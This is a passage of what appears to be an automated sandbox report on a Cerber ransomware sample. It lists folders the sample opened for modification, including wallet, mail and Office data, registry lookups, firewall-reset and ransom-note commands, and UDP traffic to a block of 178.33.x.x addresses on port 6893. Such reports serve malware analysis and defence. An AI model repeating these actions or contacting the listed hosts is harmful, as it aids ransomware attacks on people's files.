| File opened for modification | \??\c:\program files (x86)\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cerber.exe
"C:\Users\Admin\AppData\Local\Temp\cerber.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___QJOD_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___V8ODSW6_.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "cerber.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| FR | 178.33.158.0:6893 | udp | |
| FR | 178.33.158.1:6893 | udp | |
| FR | 178.33.158.2:6893 | udp | |
| FR | 178.33.158.3:6893 | udp | |
| FR | 178.33.158.4:6893 | udp | |
| FR | 178.33.158.5:6893 | udp | |
| FR | 178.33.158.6:6893 | udp | |
| FR | 178.33.158.7:6893 | udp | |
| FR | 178.33.158.8:6893 | udp | |
| FR | 178.33.158.9:6893 | udp | |
| FR | 178.33.158.10:6893 | udp | |
| FR | 178.33.158.11:6893 | udp | |
| FR | 178.33.158.12:6893 | udp | |
| FR | 178.33.158.13:6893 | udp | |
| FR | 178.33.158.14:6893 | udp | |
| FR | 178.33.158.15:6893 | udp | |
| FR | 178.33.158.16:6893 | udp | |
| FR | 178.33.158.17:6893 | udp | |
| FR | 178.33.158.18:6893 | udp | |
| FR | 178.33.158.19:6893 | udp | |
| FR | 178.33.158.20:6893 | udp | |
| FR | 178.33.158.21:6893 | udp | |
| FR | 178.33.158.22:6893 | udp | |
| FR | 178.33.158.23:6893 | udp | |
| FR | 178.33.158.24:6893 | udp | |
| FR | 178.33.158.25:6893 | udp | |
| FR | 178.33.158.26:6893 | udp | |
| FR | 178.33.158.27:6893 | udp | |
| FR | 178.33.158.28:6893 | udp | |
| FR | 178.33.158.29:6893 | udp | |
| FR | 178.33.158.30:6893 | udp | |
| FR | 178.33.158.31:6893 | udp | |
| FR | 178.33.159.0:6893 | udp | |
| FR | 178.33.159.1:6893 | udp | |
| FR | 178.33.159.2:6893 | udp | |
| FR | 178.33.159.3:6893 | udp | |
| FR | 178.33.159.4:6893 | udp | |
| FR | 178.33.159.5:6893 | udp | |
| FR | 178.33.159.6:6893 | udp | |
| FR | 178.33.159.7:6893 | udp | |
| FR | 178.33.159.8:6893 | udp | |
| FR | 178.33.159.9:6893 | udp | |
| FR | 178.33.159.10:6893 | udp | |
| FR | 178.33.159.11:6893 | udp | |
| FR | 178.33.159.12:6893 | udp | |
| FR | 178.33.159.13:6893 | udp | |
| FR | 178.33.159.14:6893 | udp | |
| FR | 178.33.159.15:6893 | udp | |
| FR | 178.33.159.16:6893 | udp | |
| FR | 178.33.159.17:6893 | udp | |
| FR | 178.33.159.18:6893 | udp | |
| FR | 178.33.159.19:6893 | udp | |
| FR | 178.33.159.20:6893 | udp | |
| FR | 178.33.159.21:6893 | udp | |
| FR | 178.33.159.22:6893 | udp | |
| FR | 178.33.159.23:6893 | udp | |
| FR | 178.33.159.24:6893 | udp | |
| FR | 178.33.159.25:6893 | udp | |
| FR | 178.33.159.26:6893 | udp | |
| FR | 178.33.159.27:6893 | udp | |
| FR | 178.33.159.28:6893 | udp | |
| FR | 178.33.159.29:6893 | udp | |
| FR | 178.33.159.30:6893 | udp | |
| FR | 178.33.159.31:6893 | udp | |
| FR | 178.33.160.0:6893 | udp | |
| FR | 178.33.160.1:6893 | udp | |
| FR | 178.33.160.2:6893 | udp | |
| FR | 178.33.160.3:6893 | udp | |
| FR | 178.33.160.4:6893 | udp | |
| FR | 178.33.160.5:6893 | udp | |
| FR | 178.33.160.6:6893 | udp | |
| FR | 178.33.160.7:6893 | udp | |
| FR | 178.33.160.8:6893 | udp | |
| FR | 178.33.160.9:6893 | udp | |
| FR | 178.33.160.10:6893 | udp | |
| FR | 178.33.160.11:6893 | udp | |
| FR | 178.33.160.12:6893 | udp | |
| FR | 178.33.160.13:6893 | udp | |
| FR | 178.33.160.14:6893 | udp | |
| FR | 178.33.160.15:6893 | udp | |
| FR | 178.33.160.16:6893 | udp | |
| FR | 178.33.160.17:6893 | udp | |
| FR | 178.33.160.18:6893 | udp | |
| FR | 178.33.160.19:6893 | udp | |
| FR | 178.33.160.20:6893 | udp | |
| FR | 178.33.160.21:6893 | udp | |
| FR | 178.33.160.22:6893 | udp | |
| FR | 178.33.160.23:6893 | udp | |
| FR | 178.33.160.24:6893 | udp | |
| FR | 178.33.160.25:6893 | udp | |
| FR | 178.33.160.26:6893 | udp | |
| FR | 178.33.160.27:6893 | udp | |
| FR | 178.33.160.28:6893 | udp | |
| FR | 178.33.160.29:6893 | udp | |
| FR | 178.33.160.30:6893 | udp | |
| FR | 178.33.160.31:6893 | udp | |
| FR | 178.33.160.32:6893 | udp | |
| FR | 178.33.160.33:6893 | udp | |
| FR | 178.33.160.34:6893 | udp | |
| FR | 178.33.160.35:6893 | udp | |
| FR | 178.33.160.36:6893 | udp | |
| FR | 178.33.160.37:6893 | udp | |
| FR | 178.33.160.38:6893 | udp | |
| FR | 178.33.160.39:6893 | udp | |
| FR | 178.33.160.40:6893 | udp | |
| FR | 178.33.160.41:6893 | udp | |
| FR | 178.33.160.42:6893 | udp | |
| FR | 178.33.160.43:6893 | udp | |
| FR | 178.33.160.44:6893 | udp | |
| FR | 178.33.160.45:6893 | udp | |
| FR | 178.33.160.46:6893 | udp | |
| FR | 178.33.160.47:6893 | udp | |
| FR | 178.33.160.48:6893 | udp | |
| FR | 178.33.160.49:6893 | udp | |
| FR | 178.33.160.50:6893 | udp | |
| FR | 178.33.160.51:6893 | udp | |
| FR | 178.33.160.52:6893 | udp | |
| FR | 178.33.160.53:6893 | udp | |
| FR | 178.33.160.54:6893 | udp | |
| FR | 178.33.160.55:6893 | udp | |
| FR | 178.33.160.56:6893 | udp | |
| FR | 178.33.160.57:6893 | udp | |
| FR | 178.33.160.58:6893 | udp | |
| FR | 178.33.160.59:6893 | udp | |
| FR | 178.33.160.60:6893 | udp | |
| FR | 178.33.160.61:6893 | udp | |
| FR | 178.33.160.62:6893 | udp | |
| FR | 178.33.160.63:6893 | udp | |
| FR | 178.33.160.64:6893 | udp | |
| FR | 178.33.160.65:6893 | udp | |
| FR | 178.33.160.66:6893 | udp | |
| FR | 178.33.160.67:6893 | udp | |
| FR | 178.33.160.68:6893 | udp | |
| FR | 178.33.160.69:6893 | udp | |
| FR | 178.33.160.70:6893 | udp | |
| FR | 178.33.160.71:6893 | udp | |
| FR | 178.33.160.72:6893 | udp | |
| FR | 178.33.160.73:6893 | udp | |
| FR | 178.33.160.74:6893 | udp | |
| FR | 178.33.160.75:6893 | udp | |
| FR | 178.33.160.76:6893 | udp | |
| FR | 178.33.160.77:6893 | udp | |
| FR | 178.33.160.78:6893 | udp | |
| FR | 178.33.160.79:6893 | udp | |
| FR | 178.33.160.80:6893 | udp | |
| FR | 178.33.160.81:6893 | udp | |
| FR | 178.33.160.82:6893 | udp | |
| FR | 178.33.160.83:6893 | udp | |
| FR | 178.33.160.84:6893 | udp | |
| FR | 178.33.160.85:6893 | udp | |
| FR | 178.33.160.86:6893 | udp | |
| FR | 178.33.160.87:6893 | udp | |
| FR | 178.33.160.88:6893 | udp | |
| FR | 178.33.160.89:6893 | udp | |
| FR | 178.33.160.90:6893 | udp | |
| FR | 178.33.160.91:6893 | udp | |
| FR | 178.33.160.92:6893 | udp | |
| FR | 178.33.160.93:6893 | udp | |
| FR | 178.33.160.94:6893 | udp | |
| FR | 178.33.160.95:6893 | udp | |
| FR | 178.33.160.96:6893 | udp | |
| FR | 178.33.160.97:6893 | udp | |
| FR | 178.33.160.98:6893 | udp | |
| FR | 178.33.160.99:6893 | udp | |
| FR | 178.33.160.100:6893 | udp | |
| FR | 178.33.160.101:6893 | udp | |
| FR | 178.33.160.102:6893 | udp | |
| FR | 178.33.160.103:6893 | udp | |
| FR | 178.33.160.104:6893 | udp | |
| FR | 178.33.160.105:6893 | udp | |
| FR | 178.33.160.106:6893 | udp | |
| FR | 178.33.160.107:6893 | udp | |
| FR | 178.33.160.108:6893 | udp | |
| FR | 178.33.160.109:6893 | udp | |
| FR | 178.33.160.110:6893 | udp | |
| FR | 178.33.160.111:6893 | udp | |
| FR | 178.33.160.112:6893 | udp | |
| FR | 178.33.160.113:6893 | udp | |
| FR | 178.33.160.114:6893 | udp | |
| FR | 178.33.160.115:6893 | udp | |
| FR | 178.33.160.116:6893 | udp | |
| FR | 178.33.160.117:6893 | udp | |
| FR | 178.33.160.118:6893 | udp | |
| FR | 178.33.160.119:6893 | udp | |
| FR | 178.33.160.120:6893 | udp | |
| FR | 178.33.160.121:6893 | udp | |
| FR | 178.33.160.122:6893 | udp | |
| FR | 178.33.160.123:6893 | udp | |
| FR | 178.33.160.124:6893 | udp | |
| FR | 178.33.160.125:6893 | udp | |
| FR | 178.33.160.126:6893 | udp | |
| FR | 178.33.160.127:6893 | udp | |
| FR | 178.33.160.128:6893 | udp | |
| FR | 178.33.160.129:6893 | udp | |
| FR | 178.33.160.130:6893 | udp | |
| FR | 178.33.160.131:6893 | udp | |
| FR | 178.33.160.132:6893 | udp | |
| FR | 178.33.160.133:6893 | udp | |
| FR | 178.33.160.134:6893 | udp | |
| FR | 178.33.160.135:6893 | udp | |
| FR | 178.33.160.136:6893 | udp | |
| FR | 178.33.160.137:6893 | udp | |
| FR | 178.33.160.138:6893 | udp | |
| FR | 178.33.160.139:6893 | udp | |
| FR | 178.33.160.140:6893 | udp | |
| FR | 178.33.160.141:6893 | udp | |
| FR | 178.33.160.142:6893 | udp | |
| FR | 178.33.160.143:6893 | udp | |
| FR | 178.33.160.144:6893 | udp | |
| FR | 178.33.160.145:6893 | udp | |
| FR | 178.33.160.146:6893 | udp | |
| FR | 178.33.160.147:6893 | udp | |
| FR | 178.33.160.148:6893 | udp | |
| FR | 178.33.160.149:6893 | udp | |
| FR | 178.33.160.150:6893 | udp | |
| FR | 178.33.160.151:6893 | udp | |
| FR | 178.33.160.152:6893 | udp | |
| FR | 178.33.160.153:6893 | udp | |
| FR | 178.33.160.154:6893 | udp | |
| FR | 178.33.160.155:6893 | udp | |
| FR | 178.33.160.156:6893 | udp | |
| FR | 178.33.160.157:6893 | udp | |
| FR | 178.33.160.158:6893 | udp | |
| FR | 178.33.160.159:6893 | udp | |
| FR | 178.33.160.160:6893 | udp | |
| FR | 178.33.160.161:6893 | udp | |
| FR | 178.33.160.162:6893 | udp | |
| FR | 178.33.160.163:6893 | udp | |
| FR | 178.33.160.164:6893 | udp | |
| FR | 178.33.160.165:6893 | udp | |
| FR | 178.33.160.166:6893 | udp | |
| FR | 178.33.160.167:6893 | udp | |
| FR | 178.33.160.168:6893 | udp | |
| FR | 178.33.160.169:6893 | udp | |
| FR | 178.33.160.170:6893 | udp | |
| FR | 178.33.160.171:6893 | udp | |
| FR | 178.33.160.172:6893 | udp | |
| FR | 178.33.160.173:6893 | udp | |
| FR | 178.33.160.174:6893 | udp | |
| FR | 178.33.160.175:6893 | udp | |
| FR | 178.33.160.176:6893 | udp | |
| FR | 178.33.160.177:6893 | udp | |
| FR | 178.33.160.178:6893 | udp | |
| FR | 178.33.160.179:6893 | udp | |
| FR | 178.33.160.180:6893 | udp | |
| FR | 178.33.160.181:6893 | udp | |
| FR | 178.33.160.182:6893 | udp | |
| FR | 178.33.160.183:6893 | udp | |
| FR | 178.33.160.184:6893 | udp | |
| FR | 178.33.160.185:6893 | udp | |
| FR | 178.33.160.186:6893 | udp | |
| FR | 178.33.160.187:6893 | udp | |
| FR | 178.33.160.188:6893 | udp | |
| FR | 178.33.160.189:6893 | udp | |
| FR | 178.33.160.190:6893 | udp | |
| FR | 178.33.160.191:6893 | udp | |
| FR | 178.33.160.192:6893 | udp | |
| FR | 178.33.160.193:6893 | udp | |
| FR | 178.33.160.194:6893 | udp | |
| FR | 178.33.160.195:6893 | udp | |
| FR | 178.33.160.196:6893 | udp | |
| FR | 178.33.160.197:6893 | udp | |
| FR | 178.33.160.198:6893 | udp | |
| FR | 178.33.160.199:6893 | udp | |
| FR | 178.33.160.200:6893 | udp | |
| FR | 178.33.160.201:6893 | udp | |
| FR | 178.33.160.202:6893 | udp | |
| FR | 178.33.160.203:6893 | udp | |
| FR | 178.33.160.204:6893 | udp | |
| FR | 178.33.160.205:6893 | udp | |
| FR | 178.33.160.206:6893 | udp | |
| FR | 178.33.160.207:6893 | udp | |
| FR | 178.33.160.208:6893 | udp | |
| FR | 178.33.160.209:6893 | udp | |
| FR | 178.33.160.210:6893 | udp | |
| FR | 178.33.160.211:6893 | udp | |
| FR | 178.33.160.212:6893 | udp | |
| FR | 178.33.160.213:6893 | udp | |
| FR | 178.33.160.214:6893 | udp | |
| FR | 178.33.160.215:6893 | udp | |
| FR | 178.33.160.216:6893 | udp | |
| FR | 178.33.160.217:6893 | udp | |
| FR | 178.33.160.218:6893 | udp | |
| FR | 178.33.160.219:6893 | udp | |
| FR | 178.33.160.220:6893 | udp | |
| FR | 178.33.160.221:6893 | udp | |
| FR | 178.33.160.222:6893 | udp | |
| FR | 178.33.160.223:6893 | udp | |
| FR | 178.33.160.224:6893 | udp | |
| FR | 178.33.160.225:6893 | udp | |
| FR | 178.33.160.226:6893 | udp | |
| FR | 178.33.160.227:6893 | udp | |
| FR | 178.33.160.228:6893 | udp | |
| FR | 178.33.160.229:6893 | udp | |
| FR | 178.33.160.230:6893 | udp | |
| FR | 178.33.160.231:6893 | udp | |
| FR | 178.33.160.232:6893 | udp | |
| FR | 178.33.160.233:6893 | udp | |
| FR | 178.33.160.234:6893 | udp | |
| FR | 178.33.160.235:6893 | udp | |
| FR | 178.33.160.236:6893 | udp | |
| FR | 178.33.160.237:6893 | udp | |
| FR | 178.33.160.238:6893 | udp | |
| FR | 178.33.160.239:6893 | udp | |
| FR | 178.33.160.240:6893 | udp | |
| FR | 178.33.160.241:6893 | udp | |
| FR | 178.33.160.242:6893 | udp | |
| FR | 178.33.160.243:6893 | udp | |
| FR | 178.33.160.244:6893 | udp | |
| FR | 178.33.160.245:6893 | udp | |
| FR | 178.33.160.246:6893 | udp | |
| FR | 178.33.160.247:6893 | udp | |
| FR | 178.33.160.248:6893 | udp | |
| FR | 178.33.160.249:6893 | udp | |
| FR | 178.33.160.250:6893 | udp | |
| FR | 178.33.160.251:6893 | udp | |
| FR | 178.33.160.252:6893 | udp | |
| FR | 178.33.160.253:6893 | udp | |
| FR | 178.33.160.254:6893 | udp | |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.158.33.178.in-addr.arpa | udp |
